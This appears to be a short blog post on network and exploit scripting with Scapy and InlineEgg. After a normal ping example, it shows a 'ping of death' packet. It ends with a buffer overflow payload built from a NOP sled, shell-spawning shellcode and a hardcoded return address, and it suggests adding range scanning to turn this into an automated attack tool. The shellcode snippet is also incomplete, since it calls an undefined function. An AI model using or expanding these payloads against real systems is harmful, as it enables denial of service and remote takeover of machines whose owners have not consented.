Between Scapy and Inline Egg,
scripting network probes and [remote] buffer overflows has gotten much simpler. Scapy allows you to interactively craft packets and send/receive
them, once you've debugged the packet construction, you can drop it to a python script for re-use. Inline Egg takes care of crafting null-less
opcode segments for hijacking running processes.
Scapy comes with a slew of protocols, and handy tools like traceroute, arpcachepoison, p0f, etc. Here's an example of
interactively crafting some pings:
# normal ping
>>> ip = IP(dst="192.168.1.1")
>>> pkt = ip/ICMP()/"0xDECAFBAD"
>>> ans,unans = sr( pkt )
.Finished to send 1 packets.
Received 2 packets, got 1 answers, remaining 0 packets
0000 08:11:27.604624 IP / ICMP 192.168.1.50 > 192.168.1.1 echo-request 0 / Raw ==> IP / ICMP 192.168.1.1 > 192.168.1.50 echo-reply 0 / Raw / Padding
0000 30 78 44 45 43 41 46 42 41 44 0xDECAFBAD
# ping of death
>>> pkt = ip / ICMP() / "0xDECAFBAD"*6551
>>> ans,drops = sr( pkt )
Inline Egg has a lot of power, check out this basic shellcode creation below.
One just needs to parametrize this, add some range scanning, and you have a very usable automated tool.
import inlineegg.inlineegg as ie
egg = ie.InlineEgg(ie.Linuxx86Syscall) # FreeBSDx86Syscall OpenBSDx86Syscall
# create egg
egg = stdinShellEgg()
retAddr = struct.pack('<L',0xbffffc24L)
toSend = "\x90"*(1024-len(egg))
toSend += egg.getCode()
toSend += retAddr*20